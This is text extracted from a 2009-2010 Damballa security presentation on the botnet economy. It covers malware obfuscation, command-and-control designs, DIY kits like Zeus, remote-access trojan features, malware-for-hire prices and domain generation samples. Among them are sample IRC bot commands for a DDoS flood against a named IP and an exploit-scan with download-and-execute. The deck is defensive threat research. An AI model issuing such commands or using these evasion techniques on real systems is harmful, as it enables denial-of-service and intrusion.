Your Computer Is Worth 30¢
This battle for control of your
Gunter Ollmann, Vice President of Research
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
About
Gunter Ollmann• VP of Research, Damballa Inc.
Damballa Inc.• Atlanta based security company focused on
enterprise detection and mitigation of botnets
Brief Bio:• Been in IT industry for two decades Built and run international
pentest teams, R&D groups and consulting practices around the world.
• Formerly Chief Security Strategist for IBM, Director of X-Force for ISS, Professional Services Director for NGS Software, Head of Attack Services EMEA, etc.
•• http://blog.damballa.com & http://technicalinfodotnet.blogspot.com/
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Perspective…
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Targeted?
Targeted in what sense?
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Targeted Attacks?
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Access to the enterprise
Submit a CV
Hand out USB drives
Purchase from botnet
masters
2000 2005 2009
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Different Ways of Looking at the Threat?
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Serial Variants
Code MetamorphismRandom changes to the codes structures and procedures.
Noise InsertionInsertion of noise instructions and whitespace commands.
CompilersDifferent compilers (and versions) are used to generate different code.
Original MalwareSource-code or DIY malware creator kit generates original code.
Noise Insertion
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Cryptors, Packers and Binders
Original MalwareSource-code or DIY malware creator kit generates original code.
BindersTake the malware and bind it with(in) other innocuous software.
CryptorsEncrypt the malware, so it can only be decrypted in real-time on the host.
PackersCompress the malware to make it small, compact and random
QAAutomatically run the new malware through AV detection tests.
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Avoiding analysis systems
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Virus Testing
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Bot spreading & Support
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Command & Control Evolution
Star TopologyCommon clustering
Hierarchical TopologyEasy to sell/rent branches
Multi-server TopologyHigh resilience to shut-down
RandomP2P, etc.
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Botnet Command and Control
IRC Command and Control is still common for botnet management
Command language varies upon nature of botnet capabilities
Sample bot command sequence
Sdbot/Reptile
1: .udp 208.43.216.195 1995 999999999999 –s
2: .ddos.ack 208.43.216.195 1995 9999999999999 –s
…typically used for DDoS
Rbots
1: scan.start ms08_067_netapi 25 3 download+exec x.x.x.x
2: .scan 75 1 201.x.x.x 2 1 201.x.x.x
3: .root.start lsass_445 100 3 0 -r –s
…scan hosts within a Class-A for port 443 and attempt to exploit (Conflcker)
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
IRC CnC Host Controls
SpyBot
SDbot
Agobot
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Zeus & Distribution
1
2
3
ZEUS DIY Kit• RRP: $400 (street price ~$50)• Botnet CnC package with Web management frontend.• Very popular – many plug-ins developed to extend functionality
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Sophisticated Management
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Sophisticated Management
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Visibility…
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
1
2
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Keylogger Octopus
Basic DIY kit
• Evolution of free kit (incl. source code)
$30 for commercial version
1
2
3
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
RAT Spy-Net v1.8
1
43
2
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
RAT Aero-Rat v0.3
2
3
1
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
RAT Turkojan v4
-Trojan creator
V.4 New features• Remote Desktop
• Webcam Streaming
• Audio Streaming
• Remote passwords
• MSN Sniffer
• Remote Shell
• Advanced File Manager
• Online & Offline keylogger
• Information about remote computer
• Etc..
Three versions• Gold, Silver & Bronze
2
1
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
RAT PayDay v0.11
6
7
54
3
2
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Hire-a-Malware-Coder (Custom Build)
Platform: software running on MAC OS to WindowsMultitasking: have the capacity to work on multiple projectsSpeed and responsibility: at the highest levelPre-payment for new customers: 50% of the whole price, 30% pre-pay ofthe whole price for repeated customers
Rates: starting from 100 euros
I can also offer you another deal, I will share the complete source code inexchange to access to a botnet with at least 4000 infected hosts becauseI don't have time to play around with me bot right now.
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Hire-a-malware-coder Pricing
Other models exist for hire-a-malware-coder pricing
Component/functionality based pricing
• Loader 300
• FTP & Grabber 150
• Assembler Spam bases 220
• Socks 4/5 70
• Botnet manager 600
• Scripts 70
• Password stealers (IE, MSN, etc.) 70
• AV-remover 70
• Screen-grabber 70
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Competition…
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Builder Battling
Zeus Worlds most popular malware DIY malware construction kit
Helps clear your system before making the malware
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Battling at the Victims Host
Similar kit to Zeus
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Dynamic Domain Generation
Designed to thwart domain hijacking/closure
Sinowalfhwwhkis.comfhksvbjj.comkixxgxhi.comdfhkxefj.bizxchtucfx.comehbcihsg.comhtiukhwb.comxddjsvgh.comivfjxxgf.comicdkvcjf.com
Bobax/Torpigcfzxkefy.2mydns.netozzlcjfwxy.mykgb.comuavpmphb.zipitover.comnltngl.widescreenhd.tvmohuajixthb.afraid.orgvemogoftiv.zipitover.comfwsdqcxozwi.mycoding.comiaguaku.afraid.orgpxkakigmdx.mario.orgzxeytdqgn.mario.org
Conficker A/Bjstlzaccs.cckupgc.infogyagluso.infoezffoozq.bizhxqbgkyw.orgnxmezijg.infosayklyqfhk.orgeplgu.orghlgkiyogcgs.wsoyvtk.cn
Conficker Cbjxqjh.com.svdgtqwe.becnxnp.com.pybtuutlevt.com.mtbmjlezym.com.pebynzomen.com.mxdaagsup.com.bocequxn.cacxcsicbqn.chdcmrfv.gs
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Blacklisted Researchers
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Hack-back
Curiosity killed the cat• Turn botnet against CnC investigators
Identifying the researcher• Repeated lookup of name servers• Resolution request for CnC host name• Wrong port/protocol in CnC connection• Missing handshake or keys• Identify sandbox/VM being used
Response tactics• DDoS the IP address or netblock• Spam flood the researcher• Exploit and breakout of sandbox/VM• Give different (benign) responses to the researcher
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Value…
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
How to pay
Where to look
Mechanisms for validation of buyer/seller
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Making Money With Botnets
Business Motivators for Bot Masters
• Active market for purchase/sell of corporate hosts• $500-$20,000 per host
•
• Markets for the data stolen from botnet hosts• Authentication credentials and PII
• Buy/Selling stolen documents
• blackhat• Noisy, high-volume, low profit Spam, DDoS, brute-force
• Stealthy click-fraud, corporate identity enumeration
• Reputation hijacking• Running blackhat services that leverage corporate reputation
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Buying Botnet Victims
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Worth less than you imagine
How much?1/400th of a cent per 24 hours
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Value-added Services
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
iFrame Traffic
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
URL Management
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Lookup Resilience
IP Flux• Single-flux
•
• Double-flux•
Domain Flux• Domain wildcarding
•
• Domain generation algorithms•
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Umm…
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Conclusions
Copyright © 2009-2010 Damballa, Inc. All Rights Reserved
Gunter Ollmann - VP of [email protected]
WWW – http://www.damballa.comBlog - http://blog.damballa.comBlog - http://technicalinfodotnet.blogspot.com
Thank You!
Top Related